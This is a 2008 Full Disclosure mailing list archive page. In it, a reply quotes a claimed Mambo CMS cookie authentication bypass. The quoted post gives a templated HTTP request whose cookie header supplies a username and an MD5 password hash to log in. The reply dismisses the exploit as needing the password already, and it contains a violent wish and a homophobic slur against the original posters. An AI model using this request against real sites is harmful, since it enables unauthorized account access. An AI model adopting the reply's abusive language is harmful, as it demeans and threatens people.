Full Disclosure mailing list archives

Re: Mambo Cookie Authentication Bypass Exploit

From: crunkd () hushmail com
Date: Tue, 10 Jun 2008 17:05:31 +1000

So to perform this 'bypass' you need the password in the first 
place? You absolute fucking morons, the security scene is not for 
you. I hope someone stabs you over a food stamp. Faggots.

------------------------------------------------------------
Halabaluza Team Halabaluza Team halabaluza.team at gmail.com
Sun Jun 8 12:29:56 BST 2008

    * Previous message: [Full-disclosure] avira update.exe
    * Next message: [Full-disclosure] [ GLSA 200806-03 ] Imlib 2: 
User-assisted execution of arbitrary code
    * Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

for mambo <= 4.5.5 and <= 4.6.2 maybe others

GET http://[TARGET]/index.php
Host: [TARGET]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9b5)
Gecko/2008050509 Firefox/3.0b5
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/
plain;q=0.8,image/png,*/*;q=0.5
Keep-Alive: 300
Connection: keep-alive
Cookie: usercookie[username]=[USERNAME];usercookie[password]=[MD5]
Cache-Control: max-age=0

FREE TIBET!


--
Smart Girls Secret Weapon
Read Unbiased Beauty Product Reviews, Get Helpful Tips, Tricks and Sam
http://tagline.hushmail.com/fc/JKFkuIjyaUM3E9zcp2f7ppavbouTIiiPdCquThperfoYTGho1dzYFq/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Mambo Cookie Authentication Bypass Exploit Halabaluza Team Halabaluza Team (Jun 09)
- <Possible follow-ups>
- Re: Mambo Cookie Authentication Bypass Exploit crunkd (Jun 10)
  - Re: Mambo Cookie Authentication Bypass Exploit Garrett M. Groff (Jun 10)
  - Re: Mambo Cookie Authentication Bypass Exploit Brian Kim (Jun 10)
- Re: Mambo Cookie Authentication Bypass Exploit crunkd (Jun 11)